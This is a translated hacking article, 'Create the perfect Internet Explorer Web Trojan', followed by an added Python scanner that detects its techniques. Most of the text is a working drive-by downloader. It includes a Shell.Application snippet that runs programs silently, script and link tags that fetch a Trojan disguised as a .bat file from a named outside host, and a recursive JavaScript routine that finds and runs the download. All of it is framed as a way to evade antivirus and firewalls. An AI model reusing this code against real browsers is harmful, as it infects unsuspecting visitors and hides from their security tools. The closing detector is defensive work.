Create the perfect Internet Explorer Web Trojan _ Vulnerability Research

Tags: error handling, regular expression, script tag
Author: Green Snow. Source: Eighth Regiment
To create the perfect IE web Trojan we first need a standard for "perfect". Personally, I think a perfect IE web Trojan should have at least the following four features:
One: it evades detection by anti-virus software;
Two: it does not trigger a network firewall alarm;
Three: it works on most Windows operating systems (mainly Win98, WinME, Win2000, WinXP and Win2003) and most IE versions (mainly IE5.0, IE5.5 and IE6.0), preferably even with SP patches installed;
Four: the viewer does not easily notice any change in IE; that is, it runs silently, so it can stay undetected for a long time.
Note that the four points above refer only to the web page itself and not to your Trojan program; that is, our web Trojan is only responsible for running the designated Trojan. The Trojan program itself is your own choice (don't ask me, I can't write one).
If the four points above are met, I think your horse can stay young longer and run more happily and faster...
Are you tempted by those points? Don't worry; first let's review the shortcomings of the existing kinds of IE web Trojans.
The first: IE web Trojans using the old MIME vulnerability
This Trojan is still popular, but because the vulnerability is very old, applies to few IE versions, and had such a large impact that almost everyone has patched it, its success rate is relatively low.
The second: IE web Trojans using the com.ms.activeX.ActiveXComponent vulnerability combined with the WSH and FSO controls
Although the com.ms.activeX.ActiveXComponent vulnerability exists in most IE versions and is a fairly good vulnerability with high value, it relies on the WSH and FSO controls that popular viruses call, so although it can avoid the network firewall alarm, it cannot escape anti-virus software (such as Norton).
Third: IE web Trojans using the object type confirmation vulnerability (Object Data remote execution) combined with the WSH and FSO controls (typical example: the Dynamic Shark web Trojan generator)
The biggest advantage of this Trojan is that it fits more IE versions and the vulnerability is newer, but it has the following shortcomings:
1. Because this vulnerability calls Mshta.exe to access the network and download the Trojan, it triggers firewall alarms (such as the Skynet firewall);
2. If this IE Trojan also uses the WSH and FSO controls, it likewise cannot escape anti-virus software (such as Norton), and
Dynamic Shark does exactly that. Sigh... what a pity...
3. The vulnerability also requires the web server to support dynamic pages such as ASP, JSP or CGI, which limits its use, since free and stable dynamic web hosting is now rare. Although the vulnerability can also be used in the mail MIME form (see my article on Security Focus: "Using the MIME error vulnerability... IE Object Data remote execution vulnerability utilization", http://www.xfocus.net/articles/200309/607.html), in my tests it does not work on IE6.0.
After the analysis above, don't you get this feeling: a thousand soldiers are easy to find but one general is hard to come by; horses come in herds but a steed is hard to find! Don't worry, let me put all this together and build the perfect IE web Trojan I have in mind.
First, to evade anti-virus software we cannot use the WSH and FSO controls, because anything that uses them will certainly not escape Norton. So what control can we call? Don't worry: after much hard work (honestly, I found the inspiration by accident while studying ASP Trojans) I finally found a usable control, Shell.Application. It passes IE's security checks and can run unimpeded in pages in the My Computer zone, and it is easier to execute than WSH and FSO (using a cross-domain vulnerability). See the following JavaScript code:
<script language="javascript" type="text/javascript">
var shell = new ActiveXObject("Shell.Application");
shell.NameSpace("C:\\windows\\").Items().Item("Notepad.exe").InvokeVerb();
</script>
Save this as test.htm and open it: Notepad opens automatically, without the prompt box that WSH and FSO trigger. Interested? Now we can run any program whose path is known, but we want to run our own Trojan, so we also need to download the Trojan program to the viewer's computer and find where it landed. We solve these one at a time:
1. Downloading the Trojan program to the viewer's computer
There are many solutions, such as the Windows Help file protocol (its:) arbitrary-file download vulnerability I mentioned earlier, but this time we don't need it; here are two better ways to download:
Example one: using the script tag, the code is as follows:
<script language="Icyfoxlovelace" src="http://www.godog.y365.com/wodemuma/icyfox.bat"></script>
Note that the language attribute here can be any string other than JavaScript, VBScript or JScript, even Chinese characters, and the src attribute is of course the address of your Trojan program. Because most free hosting now forbids uploading exe files for security reasons, we can rename the extension from exe to bat, pif, scr or com; it still runs.
Example two: using the link tag, the code is as follows:
<link href="http://www.godog.y365.com/wodemuma/icyfox.bat" rel=stylesheet type=text/css>
Put this code between <HEAD></HEAD>; the href attribute value is the address of the Trojan program.
These are the two best ways I know to download a Trojan; the downloaded program is saved in a subdirectory of IE's Temporary Internet Files directory.
2. Finding the path of the Trojan program downloaded to the viewer's computer
We can use some properties and methods of the Shell.Application control, combined with JS error handling (try{}catch(e){}finally{}) and recursion, to find the path of the Trojan. The code is as follows:
function Icyfoxlovelace() {
    // Get the Windows system directory and system drive from the page's own URL
    var url = document.location.href;
    var xtmu = url.substring(6, url.indexOf('\\', 9) + 1);
    var xtp = url.substr(6, 3);

    var shell = new ActiveXObject("Shell.Application");
    var runbz = 1;

    // The size of the Trojan is set here, in bytes
    // Change 198201 to the actual size of your Trojan program
    var exesize = 198201;

    // Trojan program name and extension (EXE, COM, BAT, PIF, SCR), used to recognise the downloaded Trojan
    // Change "icyfox" in the next two lines to your Trojan's name and "bat" to its extension
    var a = /icyfox\[\d*\]\.bat/gi;
    a.compile("icyfox\\[\\d*\\]\\.bat", "gi");

    var b = /[a-zA-Z]:\\/gi;
    b.compile("[a-zA-Z]:\\\\", "gi"); // regular expression that recognises a drive root

    // The following code finds and runs the Trojan program
    wjj(xtmu + "Temporary Internet Files\\"); // content.ie5\
    if (runbz) wjj(xtp + "Documents and Settings\\");
    if (runbz) yp();

    // Find and run the Trojan under all hard disk partitions
    function yp() {
        try {
            var c = new Enumerator(shell.NameSpace("c:\\").ParentFolder.Items());
            for (; !c.atEnd(); c.moveNext()) {
                if (runbz) { if (b.test(c.item().Path)) wjj(c.item().Path); }
                else break;
            }
        } catch (e) {}
    }

    // Use recursion to find and run the Trojan under the specified directory (including subdirectories)
    function wjj(dir) {
        try {
            var c = new Enumerator(shell.NameSpace(dir).Items());
            for (; !c.atEnd(); c.moveNext()) {
                if (runbz && c.item().Size == exesize && a.test(c.item().Path)) {
                    var f = c.item().Path;
                    var v = f.lastIndexOf('\\') + 1;
                    try {
                        shell.NameSpace(f.substring(0, v)).Items().Item(f.substr(v)).InvokeVerb(); // run the Trojan program
                        runbz = 0;
                        break;
                    } catch (e) {}
                }
                if (!c.item().Size) wjj(c.item().Path + "\\"); // a subdirectory: recurse into it
            }
        } catch (e) {}
    }
}
Icyfoxlovelace();
Please save the above code as icyfox.js.
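For defenders, the constructs this article depends on are easy to flag in web content: script or link tags whose src/href ends in an executable extension, script tags with a made-up language attribute, and inline scripts that instantiate Shell.Application. The scanner below is an added example written for this page, not code from the article; the sample HTML is constructed and uses a placeholder host.

```python
import re
from html.parser import HTMLParser

# Payload extensions the article says stand in for .exe on free hosting.
EXEC_EXT = re.compile(r"\.(exe|bat|pif|scr|com)(?:[?#]|$)", re.IGNORECASE)
# Script languages IE actually executes; anything else on a src'd script is a download trick.
KNOWN_LANGS = {"javascript", "jscript", "vbscript", "vbs", "ecmascript"}
SHELL_APP = re.compile(r"new\s+activexobject\s*\(\s*['\"]shell\.application['\"]", re.IGNORECASE)

class DropperScanner(HTMLParser):
    """Collects one finding string per suspicious construct."""
    def __init__(self):
        super().__init__()
        self.findings = []
        self._script_buf = None  # list while inside <script>, else None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "script":
            self._script_buf = []
            lang = a.get("language", "").lower()
            if lang and lang not in KNOWN_LANGS:
                self.findings.append("script with unknown language=%r" % a["language"])
            if EXEC_EXT.search(a.get("src", "")):
                self.findings.append("script src points at executable: " + a["src"])
        elif tag == "link" and EXEC_EXT.search(a.get("href", "")):
            self.findings.append("link href points at executable: " + a["href"])

    def handle_data(self, data):
        if self._script_buf is not None:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script_buf is not None:
            if SHELL_APP.search("".join(self._script_buf)):
                self.findings.append("inline script instantiates Shell.Application")
            self._script_buf = None

def scan_html(html):
    """Return the list of findings for one HTML document."""
    p = DropperScanner()
    p.feed(html)
    p.close()
    return p.findings

# Constructed sample reproducing the article's two download tags and its
# Shell.Application snippet; example.invalid is a placeholder host.
SAMPLE = """<html><head>
<link href="http://example.invalid/wodemuma/icyfox.bat" Rel=stylesheet type=text/css>
</head><body>
<script language="Icyfoxlovelace" src="http://example.invalid/wodemuma/icyfox.bat"></script>
<script language="javascript">
var shell = new ActiveXObject("Shell.Application");
</script></body></html>"""

if __name__ == "__main__":
    for line in scan_html(SAMPLE):
        print(line)
```

The same checks can run on proxy logs or a web-content filter; the executable-extension rule is also a reasonable match for requests issued by an IE User-Agent where the response is referenced from a script or link tag.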